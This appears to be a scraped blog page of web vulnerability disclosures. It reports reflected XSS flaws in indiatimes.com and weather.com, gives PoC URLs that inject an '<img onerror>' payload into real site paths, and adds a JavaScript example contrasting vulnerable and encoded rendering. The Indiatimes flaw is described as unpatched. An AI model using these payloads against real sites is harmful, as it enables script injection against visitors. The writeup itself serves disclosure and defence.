<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><b>More Details:</b></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://lists.openwall.net/full-disclosure/2014/10/20/8" data-mce-style="color: #000000;" href="http://lists.openwall.net/full-disclosure/2014/10/20/8" style="color: black;">http://lists.openwall.net/full-disclosure/2014/10/20/8</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" data-mce-style="color: #000000;" href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" style="color: black;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://seclists.org/fulldisclosure/2014/Oct/92" data-mce-style="color: #000000;" href="http://seclists.org/fulldisclosure/2014/Oct/92" style="color: black;">http://seclists.org/fulldisclosure/2014/Oct/92</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;" target="_blank">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" style="color: black;">http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" data-mce-style="color: #000000;" href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" style="color: black;">http://tetraph.blog.163.com/blog/static/2346030512014101115642885/</a></span><span data-mce-style="color: #000000;"><br /></span><span data-mce-style="color: #000000;"><a data-mce-href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" data-mce-style="color: #000000;" href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" style="color: black;">https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" data-mce-style="color: #000000;" href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" style="color: black;">http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" style="color: black;">http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">https://mathfas.wordpress.com/2014/11/01/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" data-mce-style="color: #000000;" href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" style="color: black;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121</a></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-11913241975927063322015-06-20T02:13:00.000-07:002015-06-20T02:13:25.357-07:00All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks <span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b style="background-color: white;"><br /></b><b style="background-color: white;">All Links in </b><b style="background-color: white;">Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks </b></span></span><br />
<div class="clearfix entry-content">
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b><b>(1) Domain Description:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.indiatimes.com</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The Times of India (TOI) is an Indian English-language daily newspaper. It is the third-largest newspaper in India by circulation and largest selling English-language daily in the world according to Audit Bureau of Circulations (India). According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership. </span><span style="font-size: small;">It is owned and published by Bennett, Coleman & Co. Ltd. which is owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of India was ranked 88th among India's most trusted brands and subsequently, according to the Brand Trust Report 2013, Times of India was ranked 100th among India's most trusted brands. In 2014 however, Times of India was ranked 174th among India's most trusted brands according to the Brand Trust Report 2014, a study conducted by Trust Research Advisory." (</span><span style="font-size: small;"><a href="http://en.wikipedia.org/" target="_blank">en.Wikipedia.org</a>)</span></span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability description:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;">The indiatimes.com website has a security problem: it is vulnerable to XSS (Cross Site Scripting) attacks.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The flaw is in how Indiatimes handles its URLs: it filters only part of the filenames in its website. All URLs under Indiatimes's "photogallery" and "top-lists" topics are affected. </span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Indiatimes uses part of the links under the "photogallery" and "top-lists" topics to construct its page content without checking those links at all. This mistake is very common in today's websites. Developers are not security experts.</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (12.04) and Microsoft IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://3.bp.blogspot.com/-F2GWTyNqTvY/VHaWmOWmMBI/AAAAAAAAAY0/6EOPcfV8rlc/s1600/indiatimes_xss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/-F2GWTyNqTvY/VHaWmOWmMBI/AAAAAAAAAY0/6EOPcfV8rlc/s1600/indiatimes_xss1.png" width="400" /></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://2.bp.blogspot.com/-xkjjU09Xh_s/VHaWnHpijjI/AAAAAAAAAY4/kDSmVSnMkxM/s1600/indiatimes_xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-xkjjU09Xh_s/VHaWnHpijjI/AAAAAAAAAY4/kDSmVSnMkxM/s1600/indiatimes_xss_2.png" width="400" /></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/</a>">homeqingdao<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/</a>">singaporemanagementuniversity<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/lifestyle/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/lifestyle/</a>">astar<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/technology/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/technology/</a>">nationaluniversityofsingapore<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be">https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html">http://securityrelated.blogspot.com/2014/11/two-topics-of-indiatimes-indiatimescom.html</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>What is XSS?</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." (OWASP)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered and Reported by:</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558910457235251201">@justqdjing</a>)</span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-1212310537951973442015-06-20T02:11:00.000-07:002015-06-20T02:11:02.342-07:00The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks<div style="color: #222222; font-family: arial, sans-serif;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Domain Description:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.weather.com/</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">"The
Weather Channel is an American basic cable and satellite television
channel which broadcasts weather forecasts and weather-related news and
analyses, along with documentaries and entertainment programming related
to weather. Launched on May 2, 1982, the channel broadcasts weather
forecasts and weather-related news and analysis, along with
documentaries and entertainment programming related to weather."</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />"As
of February 2015, The Weather Channel was received by approximately
97.3 million American households that subscribe to a pay television
service (83.6% of U.S. households with at least one television set),
which gave it the highest national distribution of any U.S. cable
channel. However, it was subsequently dropped by Verizon FiOS (losing
its approximately 5.5 millions subscribers), giving the title of most
distributed network to HLN. Actual viewership of the channel averaged
210,000 during 2013 and has been declining for several years. Content
from The Weather Channel is available for purchase from the NBCUniversal
Archives." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability description:</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The Weather Channel website has a security problem: it is vulnerable to XSS attacks.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Almost
all links under the domain weather.com are vulnerable to XSS attacks.
Attackers just need to add script at the end of The Weather Channel's
URLs. Then the scripts will be executed.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">10
thousands of links were tested with a self-written tool. During the
tests, 76.3% of the links belonging to weather.com were vulnerable to XSS
attacks.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The
cause of this vulnerability is that The Weather Channel uses URLs to
construct its HTML tags without filtering malicious script code. </span></div>
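<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Both advisories describe the same root cause: Indiatimes builds page content from its links without checking them, and The Weather Channel builds HTML tags from URLs without filtering. The JavaScript below is an added example, not code from either site or from the advisory author; it shows the raw concatenation, a partial blacklist filter, and the attribute-encoded fix, with a regression check. ORIGIN, the link template and all function names are hypothetical, and the sample path is the first Indiatimes PoC string quoted above.</span></div>

```javascript
// Added example: a page template that reflects the request path into an
// HTML attribute. ORIGIN, the template and every function name are
// hypothetical; nothing here is taken from the affected sites' code.
const ORIGIN = 'http://www.example.test';

// Vulnerable: the decoded request path is concatenated straight into a
// double-quoted attribute, so a '"' in the path ends the attribute early.
function renderVulnerable(decodedPath) {
  return '<a href="' + ORIGIN + decodedPath + '">Share this page</a>';
}

// Partial filtering (hypothetical blacklist): only <script> tags are removed.
// Markup that needs no <script> element passes through unchanged.
function stripScriptTags(s) {
  return s.replace(/<\s*\/?\s*script\b[^>]*>/gi, '');
}
function renderBlacklisted(decodedPath) {
  return '<a href="' + ORIGIN + stripScriptTags(decodedPath) + '">Share this page</a>';
}

// Hardened: encode for the output context (a quoted HTML attribute) instead
// of trying to recognise bad input. The scheme and host are fixed by ORIGIN,
// so the path cannot change where the link points.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderHardened(decodedPath) {
  return '<a href="' + escapeHtmlAttr(ORIGIN + decodedPath) + '">Share this page</a>';
}

// Regression check: the output must still be exactly one <a> element whose
// href decodes back to ORIGIN + path. Any attribute breakout fails the match.
const HTML_UNESCAPES = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
function unescapeHtml(s) {
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, name) => HTML_UNESCAPES[name]);
}
function isTemplateIntact(html, decodedPath) {
  const m = /^<a href="([^"]*)">Share this page<\/a>$/.exec(html);
  return m !== null && unescapeHtml(m[1]) === ORIGIN + decodedPath;
}

// Returns the sample paths for which a renderer's output is no longer the
// intended template.
function audit(render, paths) {
  return paths.filter((p) => !isTemplateIntact(render(p), p));
}

// Sample inputs: a benign path from this page, a constructed benign path with
// characters that need encoding, and the first PoC path quoted on this page.
const PAGE_POC = `/photogallery/">homeqingdao<img src=x onerror=prompt('justqdjing')>`;
const SAMPLE_PATHS = [
  '/photogallery/lifestyle/',
  "/top-lists/technology/tom's-picks&more", // constructed
  PAGE_POC,
];

for (const [name, render] of [
  ['vulnerable', renderVulnerable],
  ['blacklisted', renderBlacklisted],
  ['hardened', renderHardened],
]) {
  console.log(name, 'breaks on', audit(render, SAMPLE_PATHS).length, 'of', SAMPLE_PATHS.length, 'paths');
}
```
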
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #222222; font-family: arial, sans-serif; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The
vulnerability can be attacked without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
</div>
</div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /><span style="line-height: 19.6px; text-align: justify;"><br /></span></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/-T3Kjs-4XmSc/VHaXAw_oG8I/AAAAAAAAAZE/e1v9ebAtBis/s1600/weather_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-T3Kjs-4XmSc/VHaXAw_oG8I/AAAAAAAAAZE/e1v9ebAtBis/s1600/weather_1_xss.png" width="400" /></a></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/--5UajGMiSTI/VHaXAyoSHpI/AAAAAAAAAZI/ay10tmpGIbE/s1600/weather_2_xx.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/--5UajGMiSTI/VHaXAyoSHpI/AAAAAAAAAZI/ay10tmpGIbE/s1600/weather_2_xx.png" width="400" /></a></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes, e.g.</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/slideshows/main/" target="_blank">http://www.weather.com/<wbr></wbr>slideshows/main/</a>"--/>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/" target="_blank">http://www.weather.com/home-<wbr></wbr>garden/home/white-house-lawns-<wbr></wbr>20140316%22--/</a>"--/>"><img src=x onerror=prompt('justqdjing')><wbr></wbr>t%28%27justqdjing%27%29%3E</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/news/main/" target="_blank">http://www.weather.com/news/<wbr></wbr>main/</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be">https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html">http://securityrelated.blogspot.com/2014/11/the-weather-channel-weather.html</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The Weather Channel patched this vulnerability in late November, 2014 (last week). <span style="line-height: 19.6px; text-align: justify;">"The
Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools,
papers, news, and events of interest to the community. FD differs from
other security lists in its open nature and support for researchers'
right to decide how to disclose their own discovered bugs. The full
disclosure movement has been credited with forcing vendors to better
secure their products and to publicly acknowledge and fix flaws rather
than hide them. Vendor legal intimidation and censorship attempts are
not tolerated here!" Many of the following kinds of web security issues have
been published there: Buffer overflow, HTTP Response Splitting (CRLF),
CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF,
Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage,
Denial of Service, File Inclusion, Weak Encryption, Privilege
Escalation, Directory Traversal, HTML Injection, Spam. This bug was
published on Full Disclosure in November, 2014.</span></span></span></div>
<div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered by:</span></div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (<a href="https://twitter.com/justqdjing/status/558910579193040896">@justqdjing</a>)</span></div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
</div>
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /><br /><br /><br /><br /><b><br /></b><b>More Details:</b></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/89">http://seclists.org/fulldisclosure/2014/Nov/89</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/3">http://lists.openwall.net/full-disclosure/2014/11/27/3</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-fixes-web-app-flaws-the">http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-flaw</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-exploit</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://diebiyi.com/articles/security/the-weather-channel-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8">http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8</a></span></span></div>
<div>
